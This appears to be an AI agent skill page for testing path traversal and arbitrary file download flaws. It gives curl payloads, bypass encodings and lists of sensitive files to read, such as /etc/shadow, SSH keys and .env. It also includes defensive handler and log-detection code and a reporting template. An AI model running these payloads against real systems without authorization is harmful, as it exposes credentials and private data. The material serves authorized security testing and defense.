exploit-file-download

Stars: 215

Arbitrary file download vulnerability detection and exploitation using path traversal techniques, bypass methods, and sensitive file discovery. Use this skill when user needs to test for file download vulnerabilities, path traversal, or read sensitive files on target systems.

By crazyMarky. Updated 2/15/2026


Arbitrary File Download Detection & Exploitation

Authorization Warning

DANGER: File download vulnerability testing can expose sensitive system files and user data. Always ensure you have:

  • Written permission from the target system owner
  • Isolated testing environment
  • Defined scope of testing
  • Legal compliance with local regulations

Never test file download vulnerabilities on production systems without authorization.


Prerequisites

Required Tools

# Python 3 with requests library
pip install requests

# Optional: curl for manual testing
# Built-in on most systems

Optional Tools

# Burp Suite for manual testing
# OWASP ZAP for automated scanning
# ffuf for parameter fuzzing

Quick Start

Basic Path Traversal Test

# Manual test with curl
curl "https://target.com/download?file=../../../etc/passwd"

# Using the automated tester
python scripts/file_download_tester.py -u "https://target.com/download?file=document.pdf"

Sensitive File Scanner

# Scan for sensitive files after confirming vulnerability
python scripts/sensitive_file_scanner.py -u "https://target.com/download?file=FUZZ" --os linux

Common Scenarios

1. Basic Path Traversal Testing

Test for basic directory traversal vulnerabilities:

# Manual testing
curl "https://target.com/download?file=../../../etc/passwd"
curl "https://target.com/download?file=....//....//etc/passwd"

# Automated testing
python scripts/file_download_tester.py -u "https://target.com/download?file=test.pdf"

What to check:

  • Does the parameter accept ../ sequences?
  • Can you access files outside the intended directory?
  • What is the response when accessing system files?

Common payload patterns:

../../../etc/passwd
....//....//....//etc/passwd
..\..\..\..\windows\win.ini

2. URL Encoded Bypass

When basic traversal is blocked, try URL encoding:

# Single URL encoding
curl "https://target.com/download?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"

# Double URL encoding
curl "https://target.com/download?file=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd"

Encoding variations:

| Type           | Payload         |
|----------------|-----------------|
| URL encoded    | %2e%2e%2f       |
| Double encoded | %252e%252e%252f |
| Mixed          | ..%2f..%2f      |

3. Null Byte Injection

When the endpoint enforces a file-extension check:

# Null byte to truncate extension check
curl "https://target.com/download?file=../../../etc/passwd%00.jpg"
curl "https://target.com/download?file=../../../etc/passwd%00.png"

Works against:

  • Simple extension validation
  • Some path sanitization filters

4. Unicode/Double Write Bypass

When standard payloads are filtered:

# Unicode encoding
curl "https://target.com/download?file=..%c0%af..%c0%af..%c0%afetc/passwd"

# Double write (....//)
curl "https://target.com/download?file=....//....//....//etc/passwd"

# Mixed separators
curl "https://target.com/download?file=..%5c..%5c..%5cetc/passwd"
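
To make clear what each bypass in sections 1-4 is exploiting, and what a handler that resists all of them looks like, here is an added example that is not part of this skill or its scripts: a deliberately weak download handler next to a hardened one, run against a constructed sandbox directory rather than a real target. The names vulnerable_download, hardened_download, attempt and the sandbox files are assumptions made for the example. The weak handler checks the extension on the whole string, strips "../" once, and simulates the C-string truncation that made null-byte payloads work in older runtimes; the hardened one decodes exactly once, rejects undecodable bytes (%c0%af is an overlong UTF-8 encoding of "/", which only a lenient decoder accepts), allowlists the file-name form instead of stripping bad sequences, and still confirms that the resolved path sits under the base directory.

```python
"""Weak vs hardened file-download handlers, exercised with the traversal payloads above.

Added example: everything here is constructed for illustration. The sandbox stands in
for the web root, and secret.txt stands in for a file such as /etc/passwd outside it.
"""
import os
import re
import tempfile
from urllib.parse import unquote

ROOT = tempfile.mkdtemp()                       # constructed sandbox
BASE = os.path.join(ROOT, "files")              # the only directory downloads may come from
os.makedirs(BASE)
with open(os.path.join(BASE, "document.pdf"), "w") as fh:
    fh.write("public document")
with open(os.path.join(ROOT, "secret.txt"), "w") as fh:
    fh.write("root:x:0:0")                      # one level above BASE
# A symlink inside BASE that points outside it: passes name checks, fails a realpath check.
os.symlink(os.path.join(ROOT, "secret.txt"), os.path.join(BASE, "link.txt"))


class Rejected(Exception):
    """Raised when a handler refuses to serve the request."""


def framework_decode(raw_param):
    """The single percent-decode a web framework applies before the application sees a query value."""
    return unquote(raw_param, errors="strict")


def vulnerable_download(raw_param):
    """Naive filter: extension check on the whole string, one pass of '../' stripping, NUL truncation."""
    name = framework_decode(raw_param)
    if not name.endswith((".pdf", ".txt", ".jpg")):
        raise Rejected("extension")
    name = name.replace("../", "")              # '....//' survives this pass as '../'
    name = name.split("\x00", 1)[0]             # simulates a C string API: the path ends at the first NUL
    with open(os.path.join(BASE, name)) as fh:  # no check that the result stays under BASE
        return fh.read()


# Allowed form: a plain stem plus one permitted extension; no separators, dots or '%' in the stem.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]{0,63}\.(pdf|txt)")


def hardened_download(raw_param):
    """Decode once, reject anything outside the allowed form, then verify the resolved path."""
    try:
        name = framework_decode(raw_param)
    except UnicodeDecodeError:
        raise Rejected("invalid encoding")      # overlong sequences such as %c0%af land here
    if "\x00" in name:
        raise Rejected("null byte")
    if not SAFE_NAME.fullmatch(name):
        # catches ../, ..\, ....// and the %XX left behind by double encoding
        raise Rejected("name not in allowed form")
    base = os.path.realpath(BASE)
    path = os.path.realpath(os.path.join(base, name))   # resolves symlinks before the containment check
    if os.path.commonpath([base, path]) != base:
        raise Rejected("escapes base directory")
    with open(path) as fh:
        return fh.read()


def attempt(handler, raw_param):
    """Return the served content, or 'blocked: <reason>' describing why the handler refused."""
    try:
        return handler(raw_param)
    except Rejected as exc:
        return f"blocked: {exc}"
    except (FileNotFoundError, NotADirectoryError, IsADirectoryError, ValueError) as exc:
        return f"blocked: {type(exc).__name__}"


if __name__ == "__main__":
    payloads = ["document.pdf", "../secret.txt", "....//secret.txt%00.jpg",
                "%252e%252e%252fsecret.txt", "..%c0%afsecret.txt", "..%5csecret.txt", "link.txt"]
    for p in payloads:
        print(f"{p:28} weak={attempt(vulnerable_download, p)!r:34} hardened={attempt(hardened_download, p)!r}")
```

Running the file prints one row per payload. The rows worth studying: "../secret.txt" is blocked by the weak handler, which is why a stripping filter looks safe in a quick test, while "....//secret.txt%00.jpg" chains the double-write and null-byte bypasses and reads the file outside the base; "link.txt" passes every string check and is only stopped by resolving the real path. The hardened handler never tries to clean the input, it rejects anything that is not in the allowed form and then verifies where the path actually resolves.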

5. Sensitive File Discovery

After confirming vulnerability, discover sensitive files:

# Linux targets
python scripts/sensitive_file_scanner.py -u "https://target.com/download?file=FUZZ" --os linux

# Windows targets
python scripts/sensitive_file_scanner.py -u "https://target.com/download?file=FUZZ" --os windows

# Custom file list
python scripts/sensitive_file_scanner.py -u "https://target.com/download?file=FUZZ" --wordlist custom_files.txt

High-value targets (Linux):

/etc/passwd          - User accounts
/etc/shadow          - Password hashes (requires root)
/etc/hosts           - Host mappings
/proc/self/environ   - Environment variables
/var/log/apache2/access.log - Access logs
/home/user/.ssh/id_rsa - SSH private keys
/var/www/html/config.php - Web app configs

High-value targets (Windows):

C:\Windows\win.ini           - Windows configuration
C:\Windows\System32\config\SAM - User accounts
C:\inetpub\wwwroot\web.config - IIS configuration
C:\Users\Administrator\.ssh\id_rsa - SSH keys

6. Application Config Discovery

Target web application configuration files:

# Common web app configs
../../../var/www/html/config.php
../../../var/www/html/wp-config.php
../../../app/config/database.yml
../../../.env
../../../web.config

Framework-specific paths:

| Framework | Config Path            |
|-----------|------------------------|
| WordPress | wp-config.php          |
| Laravel   | .env                   |
| Django    | settings.py            |
| ASP.NET   | web.config             |
| Spring    | application.properties |

7. POST Request Testing

Test POST parameters for file download:

# Save the raw request to a file (for replay in Burp Suite / OWASP ZAP)
cat > request.txt << 'EOF'
POST /download HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

file=document.pdf
EOF

# Test with curl
curl -X POST "https://target.com/download" -d "file=../../../etc/passwd"

8. Cookie/Header Testing

Test non-parameter injection points:

# Cookie parameter
curl "https://target.com/download" --cookie "filename=../../../etc/passwd"

# Custom header
curl "https://target.com/download" -H "X-File-Path: ../../../etc/passwd"

# Referer header
curl "https://target.com/download" -H "Referer: https://target.com/?file=../../../etc/passwd"

Tool Selection Guide

| Scenario            | Tool                      | Command                                                   |
|---------------------|---------------------------|-----------------------------------------------------------|
| Quick manual test   | curl                      | curl "URL?file=../../../etc/passwd"                       |
| Automated scanning  | file_download_tester.py   | python scripts/file_download_tester.py -u URL             |
| Sensitive file scan | sensitive_file_scanner.py | python scripts/sensitive_file_scanner.py -u URL --os linux |
| Parameter fuzzing   | ffuf                      | ffuf -u "URL?file=FUZZ" -w wordlist.txt                   |
| Custom payload test | curl                      | curl "URL?file=$(cat payload.txt)"                        |

Testing Checklist

Discovery Phase

  • Identify all download endpoints (URL params, forms, API endpoints)
  • Test basic path traversal (../)
  • Check response headers for file type information

Bypass Testing

  • URL encoding (%2e%2e%2f)
  • Double URL encoding (%252e%252e%252f)
  • Null byte injection (%00)
  • Unicode encoding (%c0%af)
  • Double write (....//)
  • Mixed separators (..\ on Windows)
  • Path truncation
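
The same encodings this checklist enumerates are what a defender has to normalize before a log search will find them: a rule that looks for a literal "../" misses the double-encoded, overlong-UTF-8, double-write and backslash variants from sections 2-4, and one that looks only at the query string misses the Referer injection from section 8. The following is an added example, not one of this skill's scripts, of a small detector run over constructed Apache combined-format log lines that mirror the requests shown above. The function names (normalize, classify, scan_log, likely_successful), the sample lines, IP addresses and byte counts are all assumptions made for the example.

```python
"""Detect path-traversal attempts in web server access logs.

Added example, not one of this skill's scripts. The log lines are constructed in Apache
combined format and mirror the requests shown in the scenarios above.
"""
import re
from urllib.parse import unquote

SAMPLE_LOG = """\
203.0.113.5 - - [15/Feb/2026:10:00:01 +0000] "GET /download?file=document.pdf HTTP/1.1" 200 5120 "-" "curl/8.6.0"
203.0.113.5 - - [15/Feb/2026:10:00:02 +0000] "GET /download?file=../../../etc/passwd HTTP/1.1" 403 0 "-" "curl/8.6.0"
203.0.113.5 - - [15/Feb/2026:10:00:03 +0000] "GET /download?file=....//....//etc/passwd HTTP/1.1" 200 1843 "-" "curl/8.6.0"
203.0.113.5 - - [15/Feb/2026:10:00:04 +0000] "GET /download?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0 "-" "curl/8.6.0"
203.0.113.5 - - [15/Feb/2026:10:00:05 +0000] "GET /download?file=..%c0%af..%c0%afetc/passwd HTTP/1.1" 200 1843 "-" "curl/8.6.0"
203.0.113.5 - - [15/Feb/2026:10:00:06 +0000] "GET /download?file=report%00.jpg HTTP/1.1" 200 0 "-" "curl/8.6.0"
203.0.113.5 - - [15/Feb/2026:10:00:07 +0000] "GET /download HTTP/1.1" 200 512 "https://target.com/?file=..%5c..%5cwindows%5cwin.ini" "curl/8.6.0"
198.51.100.9 - - [15/Feb/2026:10:00:08 +0000] "GET /static/app..js?v=1.2 HTTP/1.1" 200 77 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
PCT_RE = re.compile(r"%[0-9A-Fa-f]{2}")
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")   # matches ../ and ..\ and the '../' hidden inside '....//'


def normalize(value, max_rounds=3):
    """Percent-decode until the value stops changing (bounded), so double encoding is undone."""
    current = value
    for _ in range(max_rounds):
        decoded = unquote(current, errors="replace")
        if decoded == current:
            break
        current = decoded
    return current


def classify(value):
    """Return the reasons a request component looks like a traversal attempt ([] when clean)."""
    reasons = []
    once = unquote(value, errors="replace")
    norm = normalize(value)
    if "\x00" in norm:
        reasons.append("null byte")
    if "\ufffd" in norm:                       # bytes that are not valid UTF-8, e.g. the overlong %c0%af
        reasons.append("invalid UTF-8")
        norm = norm.replace("\ufffd", "/")     # a lenient decoder would have read them as a separator
    if PCT_RE.search(once):                    # a %XX that survives one decode was double-encoded
        reasons.append("double encoding")
    if TRAVERSAL_RE.search(norm):
        reasons.append("traversal sequence")
    return reasons


def scan_log(text):
    """Return one finding per request target or Referer that carries a traversal indicator."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue                           # unparseable line; a real pipeline would count these
        size = int(m.group("bytes")) if m.group("bytes").isdigit() else 0
        for field in ("target", "referer"):
            reasons = classify(m.group(field))
            if reasons:
                findings.append({"line": line_no, "ip": m.group("ip"), "field": field,
                                 "status": int(m.group("status")), "bytes": size,
                                 "reasons": reasons})
    return findings


def likely_successful(findings):
    """Requests whose own target carried a payload and came back 2xx with a body: triage these first."""
    return [f for f in findings
            if f["field"] == "target" and 200 <= f["status"] < 300 and f["bytes"] > 0]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']:2} {f['ip']:<12} {f['field']:<7} {f['status']} {f['bytes']:>5} {', '.join(f['reasons'])}")
    print("triage first:", [f["line"] for f in likely_successful(SAMPLE_LOG and scan_log(SAMPLE_LOG))])
```

Two design points carry over to a real rule. Decoding is done in a bounded loop rather than once, and the "double encoding" reason is recorded separately, because a percent sign that survives a single decode is itself a signal even when the payload never resolves. Undecodable bytes are reported and then treated as a separator, since that is exactly how an overlong encoding gets past a filter that decodes leniently. The last line, "app..js", is the negative control: two dots not followed by a separator are normal and must not page anyone.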

Sensitive File Testing

  • Linux system files (/etc/passwd, /etc/shadow)
  • Windows system files (win.ini, SAM)
  • Application configs (.env, config.php)
  • SSH keys (id_rsa, authorized_keys)
  • Log files (access.log, error.log)
  • Database files

Post-Exploitation

  • Document all accessible files
  • Identify sensitive data exposed
  • Report severity based on data sensitivity

Resources

Scripts

  • scripts/file_download_tester.py - Automated vulnerability detection
  • scripts/sensitive_file_scanner.py - Sensitive file enumeration

Reference Documentation

  • references/bypass_techniques.md - Detailed bypass methods
  • references/sensitive_files.md - Comprehensive file lists

Assets/Wordlists

  • assets/traversal_payloads.txt - Path traversal payloads
  • assets/linux_sensitive_files.txt - Linux sensitive file paths
  • assets/windows_sensitive_files.txt - Windows sensitive file paths

Reporting Format

When reporting file download vulnerabilities, include:

╔═══════════════════════════════════════════════════════╗
║         File Download Vulnerability Report            ║
╠═══════════════════════════════════════════════════════╣
║ Target: https://target.com/download                   ║
║ Type: Path Traversal                                  ║
║ Severity: High                                        ║
╚═══════════════════════════════════════════════════════╝

Vulnerable Parameter: file
Payload: ../../../etc/passwd

Proof of Concept:
curl "https://target.com/download?file=../../../etc/passwd"

Files Confirmed Accessible:
- /etc/passwd (user accounts)
- /etc/hosts (network config)
- /var/www/html/config.php (database credentials)

Impact:
- Access to sensitive system files
- Exposure of database credentials
- Potential for further exploitation

Recommendations:
- Implement strict path validation
- Use allowlist for permitted files
- Sanitize user input for path characters
- Use chroot or container isolation

Install via CLI

npx skills add https://github.com/crazyMarky/pentest-skills --skill exploit-file-download

Repository Details

Forks: 26 | Branch: main | Path: SKILL.md